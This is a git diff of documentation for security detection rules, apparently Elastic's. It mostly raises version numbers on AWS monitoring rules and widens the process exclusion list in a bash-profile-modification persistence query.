208 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc index 59cee7c169..c40ff55ddd 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-configuration-recorder-stopped.asciidoc @@ -32,7 +32,7 @@ Identifies an AWS configuration change to stop recording a designated set of res * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc index b74fbb50f7..31ede4dc18 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-deletion-of-rds-instance-or-cluster.asciidoc @@ -37,7 +37,7 @@ Identifies the deletion of an Amazon Relational Database Service (RDS) Aurora da * Use Case: Asset Visibility * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc index 159b1fa5db..abb6999466 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-encryption-disabled.asciidoc @@ -33,7 +33,7 @@ Identifies disabling of Amazon Elastic Block Store (EBS) encryption by default i * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc index 5d46450abd..797aa13b14 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-full-network-packet-capture-detected.asciidoc @@ -34,7 +34,7 @@ Identifies potential Traffic Mirroring in an Amazon Elastic Compute Cloud (EC2) * Tactic: Exfiltration * Tactic: Collection -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc index 75a99db214..cb045eb6d5 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-creation.asciidoc @@ -35,7 +35,7 @@ Identifies the creation of an AWS Elastic Compute Cloud (EC2) network access con * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc index e0d8e0d825..c3f23b0bec 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-network-access-control-list-deletion.asciidoc @@ -35,7 +35,7 @@ Identifies the deletion of an Amazon Elastic Compute Cloud (EC2) network access * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc index fb0aee9fd7..2efd8eb714 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-snapshot-activity.asciidoc @@ -34,7 +34,7 @@ An attempt was made to modify AWS EC2 snapshot attributes. Snapshots are sometim * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc index f60b391344..cc36bf6ad5 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ec2-vm-export-failure.asciidoc @@ -33,7 +33,7 @@ Identifies an attempt to export an AWS EC2 instance. A virtual machine (VM) expo * Tactic: Exfiltration * Tactic: Collection -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc index b781126fd2..e5b98eb398 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-efs-file-system-or-mount-deleted.asciidoc @@ -32,7 +32,7 @@ Detects when an EFS File System or Mount is deleted. An adversary could break an * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc index ceee6c2902..8ba3d86c1e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-created.asciidoc @@ -31,7 +31,7 @@ Identifies when an ElastiCache security group has been created. * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc index 3d416d9b3c..2a24a6de94 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-elasticache-security-group-modified-or-deleted.asciidoc @@ -31,7 +31,7 @@ Identifies when an ElastiCache security group has been modified or deleted. * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc index 951cdd4ed3..169ded4b69 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-eventbridge-rule-disabled-or-deleted.asciidoc @@ -32,7 +32,7 @@ Identifies when a user has disabled or deleted an EventBridge rule. This activit * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc index cd6af3d3af..5a16856614 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-execution-via-system-manager.asciidoc @@ -33,7 +33,7 @@ Identifies the execution of commands and scripts via System Manager. Execution m * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc index 4333c226fa..27eb953909 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-guardduty-detector-deletion.asciidoc @@ -32,7 +32,7 @@ Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDut * Data Source: Amazon Web Services * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc index 885fd99a57..5837358d87 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-assume-role-policy-update.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to modify an AWS IAM Assume Role Policy. An adversary may at * Resources: Investigation Guide * Tactic: Privilege Escalation -*Version*: 107 +*Version*: 208 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc index 8e6ba0e4e1..292637d671 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-brute-force-of-assume-role-policy.asciidoc @@ -34,7 +34,7 @@ Identifies a high number of failed attempts to assume an AWS Identity and Access * Resources: Investigation Guide * Tactic: Credential Access -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc index 3a9868d3f1..b393f6b4f2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-deactivation-of-mfa-device.asciidoc @@ -33,7 +33,7 @@ Identifies the deactivation of a specified multi-factor authentication (MFA) dev * Resources: Investigation Guide * Tactic: Impact -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc index 61854b3e1b..1e9af572ef 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-creation.asciidoc @@ -33,7 +33,7 @@ Identifies the creation of a group in AWS Identity and Access Management (IAM). * Use Case: Identity and Access Audit * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc index 3287206e82..68b0e124bc 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-group-deletion.asciidoc @@ -32,7 +32,7 @@ Identifies the deletion of a specified AWS Identity and Access Management (IAM) * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc index 605d4f90bd..5a93c59a62 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-password-recovery-requested.asciidoc @@ -32,7 +32,7 @@ Identifies AWS IAM password recovery requests. An adversary may attempt to gain * Use Case: Identity and Access Audit * Tactic: Initial Access -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc index cd718d5266..79c3de8735 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-iam-user-addition-to-group.asciidoc @@ -34,7 +34,7 @@ Identifies the addition of a user to a specified group in AWS Identity and Acces * Tactic: Persistence * Resources: Investigation Guide -*Version*: 107 +*Version*: 208 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc index 5dfc8ee291..8c9865e19e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to disable or schedule the deletion of an AWS KMS Customer M * Use Case: Log Auditing * Tactic: Impact -*Version*: 4 +*Version*: 105 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc index 0f930f6f7d..8a8ac426f6 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-management-console-brute-force-of-root-user-identity.asciidoc @@ -32,7 +32,7 @@ Identifies a high number of failed authentication attempts to the AWS management * Use Case: Identity and Access Audit * Tactic: Credential Access -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc index 8175d383f1..6f0010ac85 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-management-console-root-login.asciidoc 
@@ -33,7 +33,7 @@ Identifies a successful login to the AWS Management Console by the Root user. * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc index 60f38604bd..e5429685a2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-cluster-creation.asciidoc @@ -35,7 +35,7 @@ Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc index 748e8ef3e4..021a3d5159 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-cluster-stoppage.asciidoc @@ -35,7 +35,7 @@ Identifies that an Amazon Relational Database Service (RDS) cluster or instance * Use Case: Asset Visibility * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc index 685bf834fd..73759b3ba2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-instance-creation.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of an Amazon Relational Database Service (RDS) Aurora da * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc index 41c605b8d8..2d661d926c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-creation.asciidoc @@ -31,7 +31,7 @@ Identifies the creation of an Amazon Relational Database Service (RDS) Security * Data Source: Amazon Web Services * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc index a3c16f6bea..fb99882493 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-security-group-deletion.asciidoc @@ -31,7 +31,7 @@ Identifies the deletion of an Amazon Relational Database Service (RDS) Security * Data Source: Amazon Web Services * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc index 6faea6a6fc..5e7d339bab 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-export.asciidoc @@ -32,7 +32,7 @@ Identifies the export of an Amazon Relational Database Service (RDS) Aurora data * Use Case: Asset Visibility * Tactic: Exfiltration -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc index bf15e6b68f..bcdbc4d9a5 100644 
--- a/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-snapshot-restored.asciidoc @@ -33,7 +33,7 @@ Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are so * Use Case: Asset Visibility * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc index 28c8db9e87..4a0264c25c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-redshift-cluster-creation.asciidoc @@ -32,7 +32,7 @@ Identifies the creation of an Amazon Redshift cluster. Unexpected creation of th * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc index 05a9f99231..94620b3416 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-root-login-without-mfa.asciidoc @@ -33,7 +33,7 @@ Identifies attempts to login to AWS as the root user without using multi-factor * Resources: Investigation Guide * Tactic: Privilege Escalation -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc index 8d2ff368cd..fe87560f89 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transfer-lock-disabled.asciidoc @@ -33,7 +33,7 @@ Identifies when a transfer lock was removed from a Route 53 domain. It is recomm * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc index 90eb2b3d79..751ab4cdff 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-53-domain-transferred-to-another-account.asciidoc @@ -32,7 +32,7 @@ Identifies when a request has been made to transfer a Route 53 domain to another * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc index 573791dea4..aba024afba 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-table-created.asciidoc @@ -34,7 +34,7 @@ Identifies when an AWS Route Table has been created. * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc index 5dbae6dde9..3d20fc1c68 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-table-modified-or-deleted.asciidoc 
@@ -38,7 +38,7 @@ Identifies when an AWS Route Table has been modified or deleted. * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc index b0bb4f6ec6..3a9b8bbdd2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route53-private-hosted-zone-associated-with-a-vpc.asciidoc @@ -32,7 +32,7 @@ Identifies when a Route53 private hosted zone has been associated with VPC. * Use Case: Asset Visibility * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc index 7f205c231c..b84acc6666 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc @@ -36,7 +36,7 @@ Identifies the deletion of various Amazon Simple Storage Service (S3) bucket con * Use Case: Asset Visibility * Tactic: Defense Evasion -*Version*: 105 +*Version*: 206 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc index 0c8e783d8b..99a1c887fd 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-saml-activity.asciidoc 
@@ -33,7 +33,7 @@ Identifies when SAML activity has occurred in AWS. An adversary could manipulate * Use Case: Identity and Access Audit * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc index 7d6839ced9..d357739fca 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-security-group-configuration-change-detection.asciidoc @@ -32,7 +32,7 @@ Identifies a change to an AWS Security Group Configuration. A security group is * Use Case: Network Security Monitoring * Tactic: Persistence -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc index 2437db4e26..cfad4bcd1d 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-security-token-service-sts-assumerole-usage.asciidoc @@ -32,7 +32,7 @@ Identifies the use of AssumeRole. AssumeRole returns a set of temporary security * Use Case: Identity and Access Audit * Tactic: Privilege Escalation -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc index 20806de094..13932b6d0c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-sts-getsessiontoken-abuse.asciidoc 
@@ -32,7 +32,7 @@ Identifies the suspicious use of GetSessionToken. Tokens could be created and us * Use Case: Identity and Access Audit * Tactic: Privilege Escalation -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc index 77709b91ce..eee7ed7680 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc @@ -34,7 +34,7 @@ Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (E * Resources: Investigation Guide * Tactic: Defense Evasion -*Version*: 107 +*Version*: 208 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc index efb280ad02..fa1b60867c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc @@ -33,7 +33,7 @@ Identifies the deletion of a specified AWS Web Application Firewall (WAF) access * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc index 44128a0e26..d780f96e5e 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc 
@@ -33,7 +33,7 @@ Identifies the deletion of a specified AWS Web Application Firewall (WAF) rule o * Use Case: Network Security Monitoring * Tactic: Defense Evasion -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc index 448a358b76..32a8f79014 100644 --- a/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/base16-or-base32-encoding-decoding-activity.asciidoc @@ -32,7 +32,7 @@ Adversaries may encode/decode data in an attempt to evade detection by host- or * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc index b8f1d229a9..458145c2bd 100644 --- a/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/bash-shell-profile-modification.asciidoc @@ -33,7 +33,7 @@ Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are * Tactic: Persistence * Data Source: Elastic Defend -*Version*: 103 +*Version*: 104 *Rule authors*: 
@@ -48,20 +48,10 @@ Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are [source, js] ---------------------------------- event.category:file and event.type:change and - process.name:(* and not (sudo or - vim or - zsh or - env or - nano or - bash or - Terminal or - xpcproxy or - login or - cat or - cp or - launchctl or - java)) and - not process.executable:(/Applications/* or /private/var/folders/* or /usr/local/*) and + process.name:(* and not (sudo or vim or zsh or env or nano or bash or Terminal or xpcproxy or login or cat or cp or + launchctl or java or dnf or tailwatchd or ldconfig or yum or semodule or cpanellogd or dockerd or authselect or chmod or + dnf-automatic or git or dpkg or platform-python)) and + not process.executable:(/Applications/* or /private/var/folders/* or /usr/local/* or /opt/saltstack/salt/bin/*) and file.path:(/private/etc/rc.local or /etc/rc.local or /home/*/.profile or diff --git a/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc b/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc index 6a330115d0..b779128258 100644 --- a/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/binary-content-copy-via-cmd-exe.asciidoc @@ -27,10 +27,11 @@ Attackers may abuse cmd.exe commands to reassemble binary fragments into a malic * OS: Windows * Use Case: Threat 